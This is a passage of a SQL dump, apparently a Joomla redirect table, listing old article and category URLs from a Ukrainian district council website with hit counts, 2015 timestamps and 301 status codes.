00:00:00',301),(17101,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31:-25032011&Itemid=62&lang=en','','','',1,0,'2015-11-03 11:56:00','0000-00-00 00:00:00',301),(17102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-11-03 11:56:02','0000-00-00 00:00:00',301),(17103,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31:-25032011&Itemid=62&lang=uk','','','',1,0,'2015-11-03 11:56:04','0000-00-00 00:00:00',301),(17104,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=en','','','',1,0,'2015-11-03 11:56:05','0000-00-00 00:00:00',301),(17105,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-11-03 11:56:07','0000-00-00 00:00:00',301),(17106,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=uk','','','',2,0,'2015-11-03 11:56:09','0000-00-00 00:00:00',301),(17107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&catid=31:-25032011&Itemid=62&lang=en','','','',1,0,'2015-11-03 11:56:10','0000-00-00 00:00:00',301),(17108,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-11-03 11:56:11','0000-00-00 00:00:00',301),(17109,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&catid=31:-25032011&Itemid=62&lang=uk','','','',1,0,'2015-11-03 11:56:14','0000-00-00 00:00:00',301),(17110,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=en','','','',1,0,'2015-11-03 11:56:16','0000-00-00 00:00:00',301),(17111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2015-11-03 11:56:18','0000-00-00 00:00:00',301),(17112,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=uk','','','',9,0,'2015-11-03 11:56:19','0000-00-00 00:00:00',301),(17113,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=uk','','','',1,0,'2015-11-03 11:56:22','0000-00-00 00:00:00',301),(17114,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-11-03 11:56:24','0000-00-00 00:00:00',301),(17115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-11-03 11:56:26','0000-00-00 00:00:00',301),(17116,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=504:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-11-03 11:57:03','0000-00-00 00:00:00',301),(17117,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&lang=uk&option=com_phocagallery&view=categories','','','',1,0,'2015-11-03 12:58:55','0000-00-00 00:00:00',301),(17118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=uk&limitstart=15','','','',7,0,'2015-11-03 12:59:46','0000-00-00 00:00:00',301),(17119,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2015-11-03 13:28:54','0000-00-00 00:00:00',301),(17120,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33:-20052011&Itemid=66&lang=ru','','','',3,0,'2015-11-03 13:28:56','0000-00-00 00:00:00',301),(17121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33:-20052011&Itemid=66&lang=uk','','','',6,0,'2015-11-03 13:28:57','0000-00-00 00:00:00',301),(17122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2015-11-03 13:28:59','0000-00-00 00:00:00',301),(17123,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33:-20052011&Itemid=66&lang=ru','','','',3,0,'2015-11-03 13:29:00','0000-00-00 00:00:00',301),(17124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33:-20052011&Itemid=66&lang=uk','','','',4,0,'2015-11-03 13:29:02','0000-00-00 00:00:00',301),(17125,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2015-11-03 13:29:03','0000-00-00 00:00:00',301),(17126,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33:-20052011&Itemid=66&lang=ru','','','',3,0,'2015-11-03 13:29:04','0000-00-00 00:00:00',301),(17127,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=330:2011-05-20-16-28-08&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-11-03 13:29:06','0000-00-00 00:00:00',301),(17128,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2015-11-03 13:29:07','0000-00-00 00:00:00',301),(17129,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33:-20052011&Itemid=66&lang=ru','','','',3,0,'2015-11-03 13:29:08','0000-00-00 00:00:00',301),(17130,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-11-03 13:29:10','0000-00-00 00:00:00',301),(17131,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2015-11-03 13:29:11','0000-00-00 00:00:00',301),(17132,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=ru','','','',4,0,'2015-11-03 13:29:13','0000-00-00 00:00:00',301),(17133,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-11-03 13:29:14','0000-00-00 00:00:00',301),(17134,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=342:----6----6--15--2011-&catid=34&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:15','0000-00-00 00:00:00',301),(17135,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=343:-2011-&catid=34&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:17','0000-00-00 00:00:00',301),(17136,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=345:2011-06-15-12-28-17&catid=34&Itemid=68&lang=uk','','','',10,0,'2015-11-03 13:29:18','0000-00-00 00:00:00',301),(17137,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:19','0000-00-00 00:00:00',301),(17138,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34:--15062011-&Itemid=68&lang=en','','','',3,0,'2015-11-03 13:29:21','0000-00-00 00:00:00',301),(17139,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34:--15062011-&Itemid=68&lang=ru','','','',3,0,'2015-11-03 13:29:22','0000-00-00 00:00:00',301),(17140,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34:--15062011-&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:24','0000-00-00 00:00:00',301),(17141,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34:--15062011-&Itemid=68&lang=ru','','','',3,0,'2015-11-03 13:29:27','0000-00-00 00:00:00',301),(17142,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34:--15062011-&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:28','0000-00-00 00:00:00',301),(17143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:29','0000-00-00 00:00:00',301),(17144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34:--15062011-&Itemid=68&lang=en','','','',3,0,'2015-11-03 13:29:31','0000-00-00 00:00:00',301),(17145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34:--15062011-&Itemid=68&lang=ru','','','',3,0,'2015-11-03 13:29:32','0000-00-00 00:00:00',301),(17146,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=349:--------20--2011--108-l---r&catid=34:--15062011-&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:33','0000-00-00 00:00:00',301),(17147,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:35','0000-00-00 00:00:00',301),(17148,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34:--15062011-&Itemid=68&lang=en','','','',5,0,'2015-11-03 13:29:36','0000-00-00 00:00:00',301),(17149,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34:--15062011-&Itemid=68&lang=ru','','','',3,0,'2015-11-03 13:29:38','0000-00-00 00:00:00',301),(17150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=350:-----l---28r----&catid=34:--15062011-&Itemid=68&lang=uk','','','',3,0,'2015-11-03 13:29:39','0000-00-00 00:00:00',301),(17151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35&Itemid=69&lang=uk','','','',3,0,'2015-11-03 13:29:40','0000-00-00 00:00:00',301),(17152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=ru','','','',3,0,'2015-11-03 13:29:42','0000-00-00 00:00:00',301),(17153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35:2011-06-30-10-56-57&Itemid=69&lang=uk','','','',4,0,'2015-11-03 13:29:43','0000-00-00 00:00:00',301),(17154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&lang=uk','','','',3,0,'2015-11-03 13:29:44','0000-00-00 00:00:00',301),(17155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-11-03 13:29:46','0000-00-00 00:00:00',301),(17156,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-11-03 13:29:47','0000-00-00 00:00:00',301),(17157,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=440:2011-10-21-16-24-47&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2015-11-03 13:29:54','0000-00-00 00:00:00',301),(17158,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=440:2011-10-21-16-24-47&catid=37:--21102011-&Itemid=72&lang=ru','','','',3,0,'2015-11-03 13:29:55','0000-00-00 00:00:00',301),(17159,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2015-11-03 13:29:57','0000-00-00 00:00:00',301),(17160,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=ru','','','',3,0,'2015-11-03 13:29:58','0000-00-00 00:00:00',301),(17161,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=441:-l-2011-2014-r-&catid=37:--21102011-&Itemid=72&lang=uk','','','',3,0,'2015-11-03 13:29:59','0000-00-00 00:00:00',301),(17162,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2015-11-03 13:30:01','0000-00-00 00:00:00',301),(17163,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=ru','','','',3,0,'2015-11-03 13:30:02','0000-00-00 00:00:00',301),(17164,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&catid=37:--21102011-&Itemid=72&lang=uk','','','',3,0,'2015-11-03 13:30:04','0000-00-00 00:00:00',301),(17165,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2015-11-03 13:30:05','0000-00-00 00:00:00',301),(17166,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37:--21102011-&Itemid=72&lang=ru','','','',4,0,'2015-11-03 13:30:06','0000-00-00 00:00:00',301),(17167,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37:--21102011-&Itemid=72&lang=uk','','','',3,0,'2015-11-03 13:30:08','0000-00-00 00:00:00',301),(17168,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&catid=38&Itemid=73&lang=uk','','','',6,0,'2015-11-03 13:30:09','0000-00-00 00:00:00',301),(17169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=472:-l-r-&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:14','0000-00-00 00:00:00',301),(17170,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38&Itemid=73&lang=uk','','','',11,0,'2015-11-03 13:30:19','0000-00-00 00:00:00',301),(17171,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=489:2011-12-02-06-51-07&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:22','0000-00-00 00:00:00',301),(17172,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4&Itemid=8&lang=en','','','',3,0,'2015-11-03 13:30:23','0000-00-00 00:00:00',301),(17173,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4&Itemid=8&lang=ru','','','',3,0,'2015-11-03 13:30:25','0000-00-00 00:00:00',301),(17174,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4&Itemid=8&lang=uk','','','',3,0,'2015-11-03 13:30:26','0000-00-00 00:00:00',301),(17175,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4:2010-06-05-12-51-18&Itemid=8&lang=en','','','',3,0,'2015-11-03 13:30:27','0000-00-00 00:00:00',301),(17176,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4:2010-06-05-12-51-18&Itemid=8&lang=uk','','','',3,0,'2015-11-03 13:30:29','0000-00-00 00:00:00',301),(17177,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:30','0000-00-00 00:00:00',301),(17178,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=505:2011-12-16-13-24-32&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:31','0000-00-00 00:00:00',301),(17179,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=506:-lr&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:33','0000-00-00 00:00:00',301),(17180,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11&lang=en','','','',3,0,'2015-11-03 13:30:34','0000-00-00 00:00:00',301),(17181,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11&lang=ru','','','',3,0,'2015-11-03 13:30:35','0000-00-00 00:00:00',301),(17182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=507:2011-12-19-17-10-52&catid=11&lang=uk','','','',3,0,'2015-11-03 13:30:37','0000-00-00 00:00:00',301),(17183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:38','0000-00-00 00:00:00',301),(17184,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:39','0000-00-00 00:00:00',301),(17185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38&Itemid=73&lang=ru','','','',3,0,'2015-11-03 13:30:42','0000-00-00 00:00:00',301),(17186,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:44','0000-00-00 00:00:00',301),(17187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:30:45','0000-00-00 00:00:00',301),(17188,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5&Itemid=6&lang=en','','','',3,0,'2015-11-03 13:30:46','0000-00-00 00:00:00',301),(17189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5&Itemid=6&lang=ru','','','',3,0,'2015-11-03 13:30:48','0000-00-00 00:00:00',301),(17190,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5&Itemid=6&lang=uk','','','',3,0,'2015-11-03 13:30:49','0000-00-00 00:00:00',301),(17191,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=en','','','',3,0,'2015-11-03 13:30:51','0000-00-00 00:00:00',301),(17192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=ru','','','',3,0,'2015-11-03 13:30:52','0000-00-00 00:00:00',301),(17193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=uk','','','',3,0,'2015-11-03 13:30:53','0000-00-00 00:00:00',301),(17194,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38&Itemid=73&lang=uk','','','',10,0,'2015-11-03 13:31:01','0000-00-00 00:00:00',301),(17195,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38:--19122011-&Itemid=73&lang=en','','','',3,0,'2015-11-03 13:31:02','0000-00-00 00:00:00',301),(17196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-03 13:31:04','0000-00-00 00:00:00',301),(17197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-11-03 13:31:05','0000-00-00 00:00:00',301),(17198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=en','','','',3,0,'2015-11-03 13:31:06','0000-00-00 00:00:00',301),(17199,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=ru','','','',3,0,'2015-11-03 13:31:08','0000-00-00 00:00:00',301),(17200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=uk','','','',3,0,'2015-11-03 13:31:09','0000-00-00 00:00:00',301),(17201,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=598:2012-02-29-14-13-44&catid=11&lang=en','','','',3,0,'2015-11-03 13:31:34','0000-00-00 00:00:00',301),(17202,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=598:2012-02-29-14-13-44&catid=11&lang=ru','','','',3,0,'2015-11-03 13:31:35','0000-00-00 00:00:00',301),(17203,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=598:2012-02-29-14-13-44&catid=11&lang=uk','','','',3,0,'2015-11-03 13:31:37','0000-00-00 00:00:00',301),(17204,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=en','','','',9,0,'2015-11-03 13:31:38','0000-00-00 00:00:00',301),(17205,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=ru','','','',3,0,'2015-11-03 13:31:40','0000-00-00 00:00:00',301),(17206,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=615:-------26032012495-12&catid=40:--28032012-&Itemid=77&lang=en','','','',3,0,'2015-11-03 13:31:42','0000-00-00 00:00:00',301),(17207,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=615:-------26032012495-12&catid=40:--28032012-&Itemid=77&lang=ru','','','',3,0,'2015-11-03 13:31:44','0000-00-00 00:00:00',301),(17208,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=615:-------26032012495-12&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-11-03 13:31:45','0000-00-00 00:00:00',301),(17209,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=en','','','',3,0,'2015-11-03 13:31:56','0000-00-00 00:00:00',301),(17210,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=ru','','','',3,0,'2015-11-03 13:31:57','0000-00-00 00:00:00',301),(17211,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-11-03 13:31:59','0000-00-00 00:00:00',301),(17212,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=42&Itemid=80&lang=uk','','','',7,0,'2015-11-03 13:32:12','0000-00-00 00:00:00',301),(17213,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=uk','','','',5,0,'2015-11-03 13:32:13','0000-00-00 00:00:00',301),(17214,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-11-03 13:32:15','0000-00-00 00:00:00',301),(17215,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-03 13:32:16','0000-00-00 00:00:00',301),(17216,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11&lang=uk','','','',3,0,'2015-11-03 13:32:17','0000-00-00 00:00:00',301),(17217,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-11-03 13:32:19','0000-00-00 00:00:00',301),(17218,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-11-03 13:32:20','0000-00-00 00:00:00',301),(17219,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=uk','','','',3,0,'2015-11-03 13:32:21','0000-00-00 00:00:00',301),(17220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-11-03 13:32:23','0000-00-00 00:00:00',301),(17221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-11-03 13:32:24','0000-00-00 00:00:00',301),(17222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2015-11-03 13:32:27','0000-00-00 00:00:00',301),(17223,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-03 13:32:29','0000-00-00 00:00:00',301),(17224,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-11-03 13:32:30','0000-00-00 00:00:00',301),(17225,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45&Itemid=84&lang=en','','','',4,0,'2015-11-03 13:32:50','0000-00-00 00:00:00',301),(17226,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45&Itemid=84&lang=ru','','','',4,0,'2015-11-03 13:32:52','0000-00-00 00:00:00',301),(17227,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45&Itemid=84&lang=uk','','','',10,0,'2015-11-03 13:32:53','0000-00-00 00:00:00',301),(17228,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45:--14112012-&Itemid=84&lang=en','','','',4,0,'2015-11-03 13:32:55','0000-00-00 00:00:00',301),(17229,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45:--14112012-&Itemid=84&lang=ru','','','',4,0,'2015-11-03 13:32:56','0000-00-00 00:00:00',301),(17233,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-?start=5','','','',7,0,'2015-11-03 14:08:52','0000-00-00 00:00:00',301),(17234,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=10','','','',5,0,'2015-11-03 14:09:12','0000-00-00 00:00:00',301),(17235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=321:------------l---------r--2011-2016-&catid=33&Itemid=66&lang=uk','','','',12,0,'2015-11-03 14:10:08','0000-00-00 00:00:00',301),(17236,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1023:-l-28r-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-03 14:32:37','0000-00-00 00:00:00',301),(17237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=uk','','','',24,0,'2015-11-03 14:46:22','0000-00-00 00:00:00',301),(17238,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=229:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-03 15:13:47','0000-00-00 00:00:00',301),(17239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-11-03 15:42:03','0000-00-00 00:00:00',301),(17240,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=869:2012-12-16-16-05-45&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-03 17:19:17','0000-00-00 00:00:00',301),(17241,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=273:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-03 17:19:17','0000-00-00 00:00:00',301),(17242,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=962:-2017-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-03 17:24:57','0000-00-00 00:00:00',301),(17243,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-11-03 17:41:31','0000-00-00 00:00:00',301),(17244,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-03 